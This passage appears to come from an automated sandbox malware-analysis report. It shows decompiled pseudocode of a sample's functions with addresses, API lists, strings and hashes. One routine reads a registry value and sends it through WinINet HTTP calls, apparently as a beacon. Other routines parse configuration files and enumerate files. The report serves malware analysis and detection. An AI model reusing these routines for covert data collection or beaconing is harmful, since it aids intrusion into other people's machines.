				_t42 = _t14;
				do {
					_t25 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t25 != 0);
				_push(_t42);
				_v20 = _t54 - _t42 + 1;
				E00E897AB(_t38, _t54 - _t42 + 1);
				_t16 =  &_v40; // 0x21362e22
				_t45 = _t16;
				E00E887BF(_t38, _t16, _t62, 0xeaafbc, 0xeaafbc);
				E00E897AB(_v16, _v12);
				return E00E8AE43(_v8 ^ _t68, _t45);
			}

0x00e897e3
0x00e897e3
0x00e897e6
0x00e897ed
0x00e897fc
0x00e89808
0x00e8980f
0x00e89814
0x00e8981f
0x00e89820
0x00e89825
0x00e8982a
0x00e89830
0x00e89836
0x00e8983c
0x00e8983f
0x00e89847
0x00e8984b
0x00e89853
0x00e8985b
0x00e89862
0x00e8986e
0x00e89873
0x00e8987d
0x00e89883
0x00e8988d
0x00e89892
0x00e89898
0x00e8989d
0x00e898a3
0x00e898a3
0x00e898a8
0x00e898af
0x00e898b5
0x00e898b8
0x00e898b8
0x00e898b8
0x00e898ba
0x00e898be
0x00e898be
0x00e898c1
0x00e898c1
0x00e898c3
0x00e898c4
0x00e898cb
0x00e898ce
0x00e898d2
0x00e898d8
0x00e898d8
0x00e898dc
0x00e898ea
0x00e89906

APIs

Part of subcall function 00E8A313: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?,?,76D681D0), ref: 00E8A37A
Part of subcall function 00E8A313: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00E8A3D2
Part of subcall function 00E8A313: wsprintfA.USER32 ref: 00E8A448
Part of subcall function 00E8A313: CharUpperBuffA.USER32(?,00000017), ref: 00E8A454
Part of subcall function 00E8A313: RegCloseKey.ADVAPI32(?), ref: 00E8A460

wsprintfA.USER32 ref: 00E89836

Part of subcall function 00E887BF: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E887DF
Part of subcall function 00E887BF: InternetConnectA.WININET(00000000,00000000,?,?,00000050,00000000,00000000,00000003), ref: 00E88831
Part of subcall function 00E887BF: HttpOpenRequestA.WININET(?,00160407,00000000,00000000,00000000,00000000,84680100,00000000), ref: 00E88892
Part of subcall function 00E887BF: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E888AD
Part of subcall function 00E887BF: HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00E888D9

Strings

+<<i, xrefs: 00E8984B
''&", xrefs: 00E89853
".6!, xrefs: 00E89847
F8A/, xrefs: 00E897E6
"(, xrefs: 00E8985B

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpOpen$InternetQueryRequestwsprintf$BuffCharCloseConnectInfoSendUpperValue
String ID: "($".6!$''&"$+<<i$F8A/
API String ID: 574757977-3680369854
Opcode ID: e366a45e75499390f392188fb71a0e22bb60725e2683eade1af0df1999ef73b1
Instruction ID: b05f418958d7d2abd7aba7cf93d9bc94551a12527a196e0af25d94724fddde1d
Opcode Fuzzy Hash: e366a45e75499390f392188fb71a0e22bb60725e2683eade1af0df1999ef73b1
Instruction Fuzzy Hash: 21319E756083408FC309EF19E981A6ABBE4AFDE304F08152DF08D77252DB356949CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00E8F519, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E8F519(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				long _t26;
				void* _t29;

				if( *0xea9080 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00E8F844(__eflags,  *0xea9080);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00E8F87F(__eflags,  *0xea9080, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E00E95627();
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00E8F87F(__eflags,  *0xea9080, 0);
								} else {
									__eflags = E00E8F87F(__eflags,  *0xea9080, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00E90985(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x00e8f520
0x00e8f533
0x00e8f53a
0x00e8f53d
0x00e8f540
0x00e8f559
0x00e8f559
0x00e8f542
0x00e8f542
0x00e8f544
0x00e8f54e
0x00e8f555
0x00e8f557
0x00e8f55e
0x00e8f560
0x00e8f567
0x00e8f56b
0x00e8f56d
0x00e8f581
0x00e8f581
0x00e8f58a
0x00e8f56f
0x00e8f57d
0x00e8f57f
0x00e8f593
0x00e8f595
0x00e8f595
0x00000000
0x00000000
0x00000000
0x00e8f57f
0x00e8f598
0x00000000
0x00000000
0x00000000
0x00e8f557
0x00e8f544
0x00e8f5a0
0x00e8f5aa
0x00e8f522
0x00e8f524
0x00e8f524

APIs

GetLastError.KERNEL32(?,?,00E8F510,00E8D425), ref: 00E8F527
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E8F535
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E8F54E
SetLastError.KERNEL32(00000000,?,00E8F510,00E8D425), ref: 00E8F5A0

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6dabb99eb3eb93fb817a63020d06ab0af4d5c41f5abd22b8c1c8918d905e341a
Instruction ID: 685d6571508ed0438f8ea4bb638c956492e970d2789f93243ba9d61c1fa89006
Opcode Fuzzy Hash: 6dabb99eb3eb93fb817a63020d06ab0af4d5c41f5abd22b8c1c8918d905e341a
Instruction Fuzzy Hash: D201FC327093115EAB193BB67CC5AA63BE4DB5A7B97202339F41CB50F1EF515C059340

Uniqueness

Uniqueness Score: -1.00%

Function 00E83B91, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00E83B91(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				intOrPtr* _t57;
				char _t65;
				signed char _t67;
				char _t69;
				intOrPtr _t71;
				char _t74;
				char* _t75;
				char _t80;
				char* _t87;
				char _t90;
				char _t91;
				char* _t92;
				char _t97;
				intOrPtr* _t100;
				intOrPtr* _t110;
				signed char _t115;
				void* _t125;
				char _t135;
				intOrPtr* _t139;
				intOrPtr* _t144;
				char _t150;
				signed int _t152;
				void* _t153;
				signed int _t154;

				_t143 = __edi;
				_t100 = __ecx;
				_t50 =  *0xea9014; // 0xa413846
				 *(_t152 + 0x13c) = _t50 ^ _t152;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t96 = 0;
				 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t152 + 0x144));
				 *((intOrPtr*)(_t152 + 0xe0)) = 0;
				_t147 = __ecx;
				 *((intOrPtr*)(_t152 + 0xec)) = 0xf;
				 *((char*)(_t152 + 0xd8)) = 0;
				E00E8D0F0(__edi, _t152 + 0x11c, 0, 0x32);
				_t153 = _t152 + 0xc;
				E00E8D0F0(_t143, _t153 + 0xe4, 0, 0x32);
				_t154 = _t153 + 0xc;
				_push(0x100);
				_t57 = E00E909A2();
				_push(_t100);
				 *((intOrPtr*)(_t154 + 0x18)) = 0;
				_t144 = _t57;
				_t150 = 0;
				E00E8646B();
				E00E876F9(_t154 + 0x28, _t147);
				while(1) {
					_push(E00E87562(_t154 + 0x18 +  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x18)) + 4)), 0xa) & 0x000000ff);
					if(( *( *((intOrPtr*)( *((intOrPtr*)(E00E87CA6(_t154 + 0x1c, _t154 + 0xcc))) + 4)) + _t64 + 0xc) & 0x00000006) == 0) {
						_t150 = _t150 + 1;
						__eflags =  *((intOrPtr*)(_t154 + 0xe0)) - 0x10;
						_t110 =  >=  ?  *((void*)(_t154 + 0xcc)) : _t154 + 0xcc;
						_t135 = _t144 - _t110;
						__eflags = _t135;
						goto L2;
					} else {
						break;
					}
					do {
						L2:
						_t65 =  *_t110;
						 *((char*)(_t135 + _t110)) = _t65;
						_t110 = _t110 + 1;
						__eflags = _t65;
					} while (_t65 != 0);
					__eflags = _t150 - 1;
					if(_t150 == 1) {
						__eflags =  *_t144 - 0xef;
						if( *_t144 == 0xef) {
							__eflags =  *((char*)(_t144 + 1)) - 0xbb;
							if( *((char*)(_t144 + 1)) == 0xbb) {
								__eflags =  *((char*)(_t144 + 2)) - 0xbf;
								if( *((char*)(_t144 + 2)) == 0xbf) {
									__eflags = _t144;
								}
							}
						}
					}
					_t144 = E00E832D9(_t144);
					while(1) {
						_t67 =  *_t144;
						__eflags = _t67;
						if(_t67 == 0) {
							break;
						}
						_t69 = E00E926DC(_t96, _t144, _t147, _t67 & 0x000000ff);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						_t144 = _t144 + 1;
						__eflags = _t144;
					}
					_t97 =  *_t144;
					__eflags = _t97 - 0x3b;
					if(_t97 == 0x3b) {
						L25:
						_t96 =  *(_t154 + 0x10);
						continue;
					}
					__eflags = _t97 - 0x23;
					if(_t97 == 0x23) {
						goto L25;
					}
					__eflags =  *((char*)(_t154 + 0xe4));
					if( *((char*)(_t154 + 0xe4)) == 0) {
						L22:
						__eflags = _t97 - 0x5b;
						if(_t97 != 0x5b) {
							__eflags = _t97;
							if(_t97 == 0) {
								goto L25;
							}
							_t147 = E00E8330B(_t144, "=:");
							_t71 =  *_t147;
							__eflags = _t71 - 0x3d;
							if(_t71 == 0x3d) {
								L31:
								 *_t147 = 0;
								_t97 = E00E832D9(_t144);
								while(1) {
									_t147 = _t147 + 1;
									_t115 =  *_t147;
									__eflags = _t115;
									if(_t115 == 0) {
										break;
									}
									_t74 = E00E926DC(_t97, _t144, _t147, _t115 & 0x000000ff);
									__eflags = _t74;
									if(_t74 == 0) {
										break;
									}
								}
								_t75 = E00E8330B(_t147, 0);
								__eflags =  *_t75;
								if( *_t75 != 0) {
									 *_t75 = 0;
								}
								E00E832D9(_t147);
								E00E91B50(_t154 + 0xe8, _t97, 0x32);
								_t154 = _t154 + 0xc;
								 *((char*)(_t154 + 0x115)) = 0;
								_push(_t147);
								_push(_t97);
								L37:
								_push(_t154 + 0x120);
								_push( *((intOrPtr*)(_t154 + 0x20)));
								_t80 = E00E841AF(_t97, _t144, _t147, __eflags);
								_t154 = _t154 + 0x10;
								__eflags = _t80;
								if(_t80 != 0) {
									goto L25;
								}
								L38:
								_t96 = _t150;
								 *(_t154 + 0x10) = _t150;
								__eflags = _t150;
								if(_t150 != 0) {
									break;
								}
								continue;
							}
							__eflags = _t71 - 0x3a;
							if(_t71 != 0x3a) {
								goto L38;
							}
							goto L31;
						}
						_t25 = _t144 + 1; // 0x1
						_t147 = _t25;
						_t87 = E00E8330B(_t25, "]");
						__eflags =  *_t87 - 0x5d;
						if( *_t87 != 0x5d) {
							goto L38;
						}
						__eflags = 0;
						 *_t87 = 0;
						E00E91B50(_t154 + 0x11c, _t147, 0x32);
						_t154 = _t154 + 0xc;
						 *((char*)(_t154 + 0x149)) = 0;
						 *((char*)(_t154 + 0xe4)) = 0;
						goto L25;
					}
					__eflags = _t97;
					if(_t97 == 0) {
						goto L22;
					}
					_t139 = _t144;
					_t19 = _t139 + 1; // 0x2
					_t125 = _t19;
					do {
						_t90 =  *_t139;
						_t139 = _t139 + 1;
						__eflags = _t90;
					} while (_t90 != 0);
					__eflags =  *((intOrPtr*)(_t154 + 0xe0)) - 0x10;
					_t127 =  >=  ?  *((void*)(_t154 + 0xd0)) : _t154 + 0xd0;
					_t91 = E00E87884( >=  ?  *((void*)(_t154 + 0xd0)) : _t154 + 0xd0,  *((intOrPtr*)(_t154 + 0xe0)), _t144, _t139 - _t125);
					__eflags = _t91;
					if(_t91 >= 0) {
						goto L22;
					}
					_t92 = E00E8330B(_t144, 0);
					__eflags =  *_t92;
					if( *_t92 != 0) {
						 *_t92 = 0;
					}
					E00E832D9(_t144);
					_push(_t144);
					_push(_t154 + 0xe8);
					goto L37;
				}
				E00E8643C(_t154 + 0x80);
				 *((intOrPtr*)(_t154 + 0x80)) = 0xe7d9c0;
				E00E8BEF7(_t154 + 0x80);
				E00E86DA4(_t154 + 0xcc);
				return E00E8AE43( *(_t154 + 0x14c) ^ _t154);
			}

0x00e83b91
0x00e83b91
0x00e83b97
0x00e83b9e
0x00e83bac
0x00e83bae
0x00e83baf
0x00e83bb0
0x00e83bb2
0x00e83bbf
0x00e83bc8
0x00e83bca
0x00e83bd5
0x00e83bdc
0x00e83be1
0x00e83bef
0x00e83bf4
0x00e83bf7
0x00e83bfc
0x00e83c01
0x00e83c06
0x00e83c0a
0x00e83c0c
0x00e83c0e
0x00e83c19
0x00e83d4d
0x00e83d6b
0x00e83d80
0x00e83c23
0x00e83c2b
0x00e83c35
0x00e83c3d
0x00e83c3d
0x00e83c3d
0x00000000
0x00000000
0x00000000
0x00e83c3f
0x00e83c3f
0x00e83c3f
0x00e83c41
0x00e83c44
0x00e83c45
0x00e83c45
0x00e83c49
0x00e83c4c
0x00e83c4e
0x00e83c51
0x00e83c53
0x00e83c57
0x00e83c59
0x00e83c5d
0x00e83c5f
0x00e83c5f
0x00e83c5d
0x00e83c57
0x00e83c51
0x00e83c69
0x00e83c7c
0x00e83c7c
0x00e83c7e
0x00e83c80
0x00000000
0x00000000
0x00e83c71
0x00e83c77
0x00e83c79
0x00000000
0x00000000
0x00e83c7b
0x00e83c7b
0x00e83c7b
0x00e83c82
0x00e83c84
0x00e83c87
0x00e83d49
0x00e83d49
0x00000000
0x00e83d49
0x00e83c8d
0x00e83c90
0x00000000
0x00000000
0x00e83c96
0x00e83c9e
0x00e83d03
0x00e83d03
0x00e83d06
0x00e83dd2
0x00e83dd4
0x00000000
0x00000000
0x00e83de6
0x00e83de8
0x00e83dea
0x00e83dec
0x00e83df2
0x00e83df4
0x00e83dfc
0x00e83e0e
0x00e83e0e
0x00e83e0f
0x00e83e11
0x00e83e13
0x00000000
0x00000000
0x00e83e04
0x00e83e0a
0x00e83e0c
0x00000000
0x00000000
0x00e83e0c
0x00e83e19
0x00e83e1e
0x00e83e21
0x00e83e23
0x00e83e23
0x00e83e28
0x00e83e38
0x00e83e3d
0x00e83e40
0x00e83e48
0x00e83e49
0x00e83e4a
0x00e83e51
0x00e83e52
0x00e83e56
0x00e83e5b
0x00e83e5e
0x00e83e60
0x00000000
0x00000000
0x00e83e66
0x00e83e66
0x00e83e68
0x00e83e6c
0x00e83e6e
0x00000000
0x00000000
0x00000000
0x00e83e74
0x00e83dee
0x00e83df0
0x00000000
0x00000000
0x00000000
0x00e83df0
0x00e83d0c
0x00e83d0c
0x00e83d16
0x00e83d1b
0x00e83d1e
0x00000000
0x00000000
0x00e83d24
0x00e83d28
0x00e83d33
0x00e83d38
0x00e83d3b
0x00e83d42
0x00000000
0x00e83d42
0x00e83ca0
0x00e83ca2
0x00000000
0x00000000
0x00e83ca4
0x00e83ca6
0x00e83ca6
0x00e83ca9
0x00e83ca9
0x00e83cab
0x00e83cac
0x00e83cac
0x00e83cb2
0x00e83cc9
0x00e83cd2
0x00e83cd9
0x00e83cdb
0x00000000
0x00000000
0x00e83ce1
0x00e83ce6
0x00e83ce9
0x00e83ceb
0x00e83ceb
0x00e83cf0
0x00e83cf5
0x00e83cfd
0x00000000
0x00e83cfd
0x00e83d8d
0x00e83d99
0x00e83da5
0x00e83db2
0x00e83dd1

APIs

Part of subcall function 00E876F9: __EH_prolog3_catch.LIBCMT ref: 00E87700

Part of subcall function 00E87CA6: __EH_prolog3_catch.LIBCMT ref: 00E87CAD

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E83DA5
_strncpy.LIBCMT ref: 00E83E38

Strings

F8A/, xrefs: 00E83B97
j;, xrefs: 00E83D99

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_catch$Ios_base_dtor_strncpystd::ios_base::_
String ID: F8A/$j;
API String ID: 287760323-1394892738
Opcode ID: f9826a13660caafbc0d3edaa3558632095fa7760907c843c526a27888f633375
Instruction ID: 74a230c2555c81a745f23522fca7cd72fe71c1fbba2eadfd573011a0b503778c
Opcode Fuzzy Hash: f9826a13660caafbc0d3edaa3558632095fa7760907c843c526a27888f633375
Instruction Fuzzy Hash: 1F7146716083818ED735FB38D850BABBBD5AF91B04F18581DE0CE77192EB308A05C762

Uniqueness

Uniqueness Score: -1.00%

Function 00E999F3, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00E999F3(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E00E933DE(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00EA3587(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E00E92919();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E00E998AF(_t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E00EA3587(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E00E99F2C(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00E964B8(_t302);
														_t305 = _v12;
													}
													E00E964B8(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E00EA3587(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00E92919();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0xea9014; // 0xa413846
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E00EA35E0(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E00E95F7B(_t245 - _t289 + 1, _t289,  &_v676, E00E96E67(__eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E00E99924( &(_v608.cFileName),  &_v640,  &_v609, E00E96E67(__eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E00E964B8(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E00E964B8(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E00EA3090(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E00E9990C);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E00E964B8(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E00E8AE43(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E00E964B8(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E00EA35A0(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
